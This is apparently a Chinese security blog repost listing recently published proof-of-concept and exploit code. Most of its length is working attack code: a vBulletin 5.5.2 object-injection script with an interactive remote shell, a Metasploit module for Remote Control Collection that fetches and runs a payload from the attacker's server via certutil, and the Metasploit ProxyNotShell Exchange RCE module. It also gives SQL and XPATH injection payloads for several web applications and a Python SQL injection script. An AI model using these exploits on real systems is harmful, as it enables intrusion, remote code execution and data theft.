【漏洞仓库】最近发布的Poc&Exp

admin 2023年1月12日08:28:21评论184 views字数 18227阅读60分45秒阅读模式

免责声明

公众号仅用于技术交流与学习,利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号只是知识的搬运工,取之于民用之于民。

1、vBulletin 5.5.2 PHP 对象注入

vBulletin 版本 <=5.5.2 存在以下问题:用户输入通过“messageids”请求参数传递到 /ajax/api/vb4_private/movepm,在调用 unserialize() PHP 函数之前未正确过滤。这可以被恶意用户利用,将任意 PHP 对象注入应用程序范围,从而允许他们执行各种攻击,例如执行任意 PHP 代码。
Poc:
<?php
/* -------------------------------------------------------------- vBulletin <= 5.5.2 (movepm) PHP Object Injection Vulnerability -------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.vbulletin.com +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "messageids" request parameter to /ajax/api/vb4_private/movepm is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to carry out a variety of attacks, such as executing arbitrary PHP code. [-] Technical writeup:
http://karmainsecurity.com/exploiting-an-nday-vbulletin-php-object-injection*/
set_time_limit(0);error_reporting(E_ERROR);
if (!extension_loaded("curl")) die("[+] cURL extension required!n");
print "+------------------------------------------------------------------+";print "n| vBulletin <= 5.5.2 (movepm) PHP Object Injection Exploit by EgiX |";print "n+------------------------------------------------------------------+n";
if ($argc != 4){ print "nUsage......: php $argv[0] <URL> <Username> <Password>n"; print "nExample....: php $argv[0] http://localhost/vb/ user passwd"; print "nExample....: php $argv[0] https://vbulletin.com/ evil hackernn"; die();}
class googlelogin_vendor_autoload {} // fake class to include the autoloader
class GuzzleHttp_HandlerStack{ private $handler, $stack; function __construct($cmd){ $this->stack = [["system"]]; // the callback we want to execute $this->handler = $cmd; // argument for the callback }}
class GuzzleHttp_Psr7_FnStream{ function __construct($callback){ $this->_fn_close = $callback; }}
function make_popchain($cmd){ $pop = new GuzzleHttp_HandlerStack($cmd); $pop = new GuzzleHttp_Psr7_FnStream([$pop, 'resolve']);
$chain = serialize([new googlelogin_vendor_autoload, $pop]);
$chain = str_replace(['s:', chr(0)], ['S:', '0'], $chain); $chain = str_replace('GuzzleHttp_HandlerStack', 'GuzzleHttpHandlerStack', $chain); $chain = str_replace('GuzzleHttp_Psr7_FnStream', 'GuzzleHttpPsr7FnStream', $chain); $chain = str_replace('0GuzzleHttpHandlerStack', '0GuzzleHttp5CHandlerStack', $chain); return $chain;}
list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);
print "[+] Logging in with username '{$user}' and password '{$pass}'n";
curl_setopt($ch, CURLOPT_URL, $url);
if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Session ID not found!n");
curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");
if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Login failed!n");
print "[+] Logged-in! Retrieving security tokenn";
curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POST, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[+] Security token not found!n");
$params = ["routestring" => "ajax/api/vb4_private/movepm", "securitytoken" => $token[1], "folderid" => 1];
print "[+] Launching shelln";
while(1){ print "nvb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $params["messageids"] = make_popchain($cmd); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); preg_match('/(.*){"response":/s', curl_exec($ch), $m) ? print $m[1] : die("n[+] Exploit failed!n");}

2、Remote Control Collection远程代码执行漏洞

Steppschuh 版本 3.1.1.12 的Remote Control Collection经过验证确认存在该漏洞,目前已发现Exp。
Exp:
class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking   prepend Msf::Exploit::Remote::AutoCheck  include Exploit::Remote::Udp  include Exploit::EXE # generate_payload_exe  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::FileDropper   def initialize(info = {})    super(      update_info(        info,        'Name' => 'Remote Control Collection RCE',        'Description' => %q{          This module utilizes the Remote Control Server's, part          of the Remote Control Collection by Steppschuh, protocol          to deploy a payload and run it from the server.  This module will only deploy          a payload if the server is set without a password (default).          Tested against 3.1.1.12, current at the time of module writing        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'H4rk3nz0' # edb, discovery        ],        'References' => [          [ 'URL', 'http://remote-control-collection.com' ],          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py' ]        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          ['default', {}],        ],        'DefaultOptions' => {          'PAYLOAD' => 'windows/shell/reverse_tcp',          'WfsDelay' => 5,          'Autocheck' => false        },        'DisclosureDate' => '2022-09-20',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1926]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),        OptString.new('PATH', [true, 'Where to stage payload for pull method', '%temp%\']),        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),      ]    )  end   def path    return datastore['PATH'] if datastore['PATH'].end_with? '\'     "#{datastore['PATH']}\"  end   def special_key_header    "x7fx15x02"  end   def key_header    "x7fx15x01"  end   def windows_key    udp_sock.put("#{special_key_header}x01x00x00x00xab") # key up    udp_sock.put("#{special_key_header}x00x00x00x00xab") # key down    sleep(datastore['SLEEP'])  end   def enter_key    udp_sock.put("#{special_key_header}x01x00x00x00x42")    sleep(datastore['SLEEP'])  end   def send_command(command)    command.each_char do |c|      udp_sock.put("#{key_header}#{c}")      sleep(datastore['SLEEP'] / 10)    end    enter_key    sleep(datastore['SLEEP'])  end   def check    @check_run = true    @check_success = false    upload_file    return Exploit::CheckCode::Vulnerable if @check_success     return Exploit::CheckCode::Safe  end   def on_request_uri(cli, _req)    @check_success = true    if @check_run # send a random file      p = Rex::Text.rand_text_alphanumeric(rand(8..17))    else      p = generate_payload_exe    end    send_response(cli, p)    print_good("Request received, sending #{p.length} bytes")  end   def upload_file    connect_udp    # send a space character to skip any screensaver    udp_sock.put("#{key_header} ")    print_status('Connecting and Sending Windows key')    windows_key     print_status('Opening command prompt')    send_command('cmd.exe')     filename = Rex::Text.rand_text_alphanumeric(rand(8..17))    filename << '.exe' unless @check_run    if @service_started.nil?      print_status('Starting up our web service...')      start_service('Path' => '/')      @service_started = true    end    get_file = "certutil.exe -urlcache -f http://#{srvhost_addr}:#{srvport}/ #{path}#{filename}"    send_command(get_file)    if @check_run.nil? || @check_run == true      send_command("del #{path}#{filename} && exit")    else      register_file_for_cleanup("#{path}#{filename}")      print_status('Executing payload')      send_command("#{path}#{filename} && exit")    end    disconnect_udp  end   def exploit    @check_run = false    upload_file  endend

3、Concrete CMS 9.1.3 XPATH Injection

Concrete CMS 9.1.3 版本存在 XPATH 注入漏洞。
Exp:
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/jsHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0
详情参考:
https://packetstormsecurity.com/files/170041/concretecms913-xpath.txt

4、Helmet Store Showroom 1.0 SQL 注入漏洞

id参数未对view_product.php文件执行输入验证,它允许经过身份验证的基于时间的SQL注入。
Exp:
# Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A # Description # The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.  import requestsimport sysimport pyfigletsess = requests.Session()  proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"} def login1(ip,username,password):    x  = "http://%s/hss/classes/Login.php?f=login" % ip    login = {'username':username, 'password':password}    r = sess.post(x, data=login, proxies=proxies)    #print(r.content)   def login(ip):    x = ("http://%s/hss/admin") % ip    r = sess.get(x,proxies=proxies)    if "Welcome to Helmet Store Showroom - PHP" in r.text:        print("--------------------------------------------")        print("[+] Success Login")      def detect_sql(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip    r = sess.get(x,proxies=proxies)    if "You have an error in your SQL syntax" in r.text:        print("[+] Found SQL Error")      def time_based_sqli(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip    r = sess.get(x,proxies=proxies)    print("[+] Time Based SQL Found")    print("[*]!!! Time To Report !!!")          if __name__ == "__main__":    result = pyfiglet.figlet_format("PWN")    print(result)    try:        ip = sys.argv[1].strip()        username = sys.argv[2].strip()        password = sys.argv[3].strip()    except IndexError:        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])        print("[-] Example: %s 192.168.1.x"  % sys.argv[0])        sys.exit(-1) login1(ip,username,password)login(ip)detect_sql(ip)time_based_sqli(ip)

5、Sanitization Management System 1.0 SQL注入漏洞

id参数似乎容易受到SQL注入攻击。
Poc:
Parameter: id (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: p=services/view_service&id=126664801' or '5968'='5975' ORNOT 5461=5461 AND 'gEud'='gEud     Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: p=services/view_service&id=126664801' or '5968'='5975' OR(SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT(ELT(5753=5753,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DEYy'='DEYy     Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=services/view_service&id=126664801' or '5968'='5975'AND (SELECT 6369 FROM (SELECT(SLEEP(5)))Rnfu) AND 'PUfi'='PUfi
详情参考:
https://0day.today/exploit/38082

6、perfSONAR 4.4.5 跨站请求伪造(CVE-2022-41413)

/perfsonar-graphs/ 测试结果页面中的 perfSONAR 版本 4.x 到 4.4.5 中存在部分盲目跨站点请求伪造 (CSRF) 漏洞。参数和值可以通过 URL 参数注入/传递,迫使客户端通过透明的 XMLHTTPRequests 在后台不知不觉地连接到其他站点。这种部分盲目的 CSRF 绕过了 perfSONAR 中内置的白名单功能。
Poc:
https://packetstormsecurity.com/files/download/170070/CVE-2022-41413.tgz

7、perfSONAR 4.4.4 开放代理/中继(CVE-2022-41412)

perfSONAR 捆绑了一个 graphData.cgi 脚本,用于绘制和可视化数据。graphData.cgi 中存在一个缺陷,允许未经身份验证的用户通过 perfSONAR 服务器代理和中继 HTTP/HTTPS 流量。该漏洞可能被用来从内部 Web 服务器中泄露或枚举数据。此漏洞已在 perfSONAR 版本 4.4.5 中修补。版本 4.x 到 4.4.4 受到影响。有一个白名单功能可以缓解,但默认情况下是禁用的。
Poc:
https://packetstormsecurity.com/files/download/170069/CVE-2022-41412.tgz

8、Microsoft Exchange ProxyNotShell 远程代码执行(CVE-2022-41040 , CVE-2022-41082)

此 Metasploit 模块链接了 Microsoft Exchange Server 上的两个漏洞,结合使用后,经过身份验证的攻击者可以与 Exchange Powershell 后端交互 (CVE-2022-41040),其中可以利用反序列化缺陷来执行代码 (CVE-2022- 41082)。此漏洞仅支持 Exchange Server 2019。这些漏洞已于 2022 年 11 月修补。
Exp:
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HTTP::Exchange include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell include Msf::Exploit::EXE
def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Exchange ProxyNotShell RCE', 'Description' => %q{ This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019.
These vulnerabilities were patched in November 2022. }, 'Author' => [ 'Orange Tsai', # Discovery of ProxyShell SSRF 'Spencer McIntyre', # Metasploit module 'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis 'Piotr Bazydło', # Vulnerability analysis 'Rich Warren', # EEMS bypass via ProxyNotRelay 'Soroush Dalili' # EEMS bypass ], 'References' => [ [ 'CVE', '2022-41040' ], # ssrf [ 'CVE', '2022-41082' ], # rce [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ], [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ], [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ], [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ] ], 'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Platform' => ['windows'], 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], 'Privileged' => true, 'Targets' => [ [ 'Windows Dropper', { 'Platform' => 'windows', 'Arch' => [ARCH_X64, ARCH_X86], 'Type' => :windows_dropper } ], [ 'Windows Command', { 'Platform' => 'windows', 'Arch' => [ARCH_CMD], 'Type' => :windows_command } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'AKA' => ['ProxyNotShell'], 'Reliability' => [REPEATABLE_SESSION] } ) )
register_options([ OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]), OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]), OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ]) ])
register_advanced_options([ OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]]) ]) end
def check @ssrf_email ||= Faker::Internet.email res = send_http('GET', '/mapi/nspi/') return CheckCode::Unknown if res.nil? return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401 return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'
# actually run the powershell cmdlet and see if it works, this will fail if: # * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN) # * the exchange emergency mitigation service M1 rule is in place return CheckCode::Safe unless execute_powershell('Get-Mailbox')
CheckCode::Vulnerable rescue Msf::Exploit::Failed => e CheckCode::Safe(e.to_s) end
def ibm037(string) string.encode('IBM037').force_encoding('ASCII-8BIT') end
def send_http(method, uri, opts = {}) opts[:authentication] = { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'preferred_auth' => 'NTLM' }
if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1' uri = "/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}" opts[:headers] = { 'X-Up-Devcap-Post-Charset' => 'IBM037', # technique needs the "UP" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362 'User-Agent' => "UP #{datastore['UserAgent']}" } else uri = "/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}" end
super(method, uri, opts) end
def exploit # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not # work on Exchange Server 2016 if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version) vprint_status("Detected Exchange version: #{version}") if version < Rex::Version.new('15.2') fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)') end end
@ssrf_email ||= Faker::Internet.email
case target['Type'] when :windows_command vprint_status("Generated payload: #{payload.encoded}") execute_command(payload.encoded) when :windows_dropper execute_cmdstager({ linemax: 7_500 }) end end
def execute_command(cmd, _opts = {}) xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root <ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"> <ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start"> <ObjectDataProvider.MethodParameters> <System:String>cmd.exe</System:String> <System:String>/c #{cmd.encode(xml: :text)}</System:String> </ObjectDataProvider.MethodParameters> </ObjectDataProvider> </ResourceDictionary> XAML
identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root <Obj N="V" RefId="14"> <TN RefId="1"> <T>System.ServiceProcess.ServiceController</T> <T>System.Object</T> </TN> <ToString>Object</ToString> <Props> <S N="Name">Type</S> <Obj N="TargetTypeForDeserialization"> <TN RefId="1"> <T>System.Exception</T> <T>System.Object</T> </TN> <MS> <BA N="SerializationData"> #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)} </BA> </MS> </Obj> </Props> <S> <![CDATA[#{xaml}]]> </S> </Obj> IDENTITY
execute_powershell('Get-Mailbox', args: [ { name: '-Identity', value: identity } ]) endend
class XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream include Msf::Util::DotNetDeserialization
def self.generate from_values([ Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1), Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values( class_info: Types::General::ClassInfo.new( obj_id: 1, name: 'System.UnitySerializationHolder', member_names: %w[Data UnityType AssemblyName] ), member_type_info: Types::General::MemberTypeInfo.new( binary_type_enums: %i[String Primitive String], additional_infos: [ 8 ] ), member_values: [ Types::Record.from_value(Types::RecordValues::BinaryObjectString.new( obj_id: 2, string: 'System.Windows.Markup.XamlReader' )), 4, Types::Record.from_value(Types::RecordValues::BinaryObjectString.new( obj_id: 3, string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' )) ] ), Types::RecordValues::MessageEnd.new ]) endend


原文始发于微信公众号(Hack All):【漏洞仓库】最近发布的Poc&Exp

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月12日08:28:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞仓库】最近发布的Poc&Exphttps://cn-sec.com/archives/1442109.html

发表评论

匿名网友 填写信息